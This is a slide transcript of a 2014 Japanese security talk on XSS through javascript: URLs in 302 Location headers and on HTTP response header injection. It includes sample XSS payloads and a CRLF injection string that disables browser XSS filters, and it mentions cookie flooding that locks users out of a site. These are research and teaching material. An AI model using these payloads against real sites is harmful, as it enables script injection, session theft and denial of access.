Shibuya.XSS Technical Talk #5 「このオブジェクトは ここ.」 デザインテンプレートはここ（宣伝）：http://sagittarius.dip.jp/toshi/template.php

1. 2014/08/07
はるぷ@Shibuya.XSS
ブラウザとWebサーバの話
1

2. XSS
》 XSSの仕方色々
☆ <script>alert('xss')</script>
☆ <div onclick="alert('xss')">xxxx
☆ <a href="javascript:alert('xss')">xxxx
2
今日は「<a href="javascript:…」に
焦点を当ててみます！

3. 302 Foundの画面
最近見かけなくなりましたねー
3

4. 302 Foundの画面
表示してみましょう！
※もちろんデフォルト設定で！
4

5. Locationヘッダの扱いの違い
Chrome IE Firefox Opera(Presto)
動きます！
空文字 ○ × ○ ○
about:blank about:blank × about:blank ○
javascript:xxx × × × ◎
通常 × × × ×
5

6. 優秀な組み合わせその1
》 Apache 2.4.7 + CGI(perl)
6

7. 優秀な組み合わせその2
》 IIS 7.5 (Windows7) + asp
7
投げやりな
メッセージが素敵

8. 惜しい！
》 WEBRick
HTTP/1.1 302 Found
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: javascript:alert(0)
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Request-Id: bb768842-983e-4ef8-b0e7-795193db1a96
X-Runtime: 0.007491
Server: WEBrick/1.3.1 (Ruby/2.1.2/2014-05-08)
Date: Sun, 06 Jul 2014 12:00:51 GMT
Content-Length: 85
Connection: Keep-Alive
<html><body>You are being <a href="javascript:alert(0)">redirected</a>.</body></html>
何故かOperaでは表示されない！
（最後に改行入れるといける）
8

9. Opera独自エンジンPresto
Wikipediaより：http://ja.wikipedia.org/wiki/Opera
非常に残念な
事件！
・Opera独自エンジン系は12.17(2014/4/23)が最新
・ちなみに、FireFoxも5.0(2011/6/21)までは似た動作します。 9

10. FireFox 5.0 + WEBrick
10

11. とりあえず正攻法でXSS
》 Apache 2.4.7 + CGI(perl)でResponse
Header Injection
「url=%0d%0a%0d%0a%3Cscript%3Ealert(‘xss’)%3C/script%3E」みたいなやつ
Apacheがレスポンスボディを
占領している！超邪魔！
11

12. とりあえず正攻法でXSS
》 色々ヘッダを足す
url=test%0d%0aStatus:500%0d%0a
X-XSS-Protection:0%0d%0a%0d%0a%3Cscript
%3Ealert('xss')%3C/script%3E
Chromeとかでも動く！
超便利！
12
Statusヘッダで302をやめる
ブラウザのXSSフィルターを
無効化！

13. おまけ
》 レスポンスヘッダインジェクションのマイ
ナーな攻撃
☆ Cookieを大量にセットする！
13

14. おまけ
》 やられると地味に復帰が困難。サイト全体
にアクセスできなくなる
14

15. まとめ
》 古くからある変な挙動も結構面白い
》 新しいものを作るときに、意外とこういった
細かいとこが再燃したりするのでまあまあ
重要
15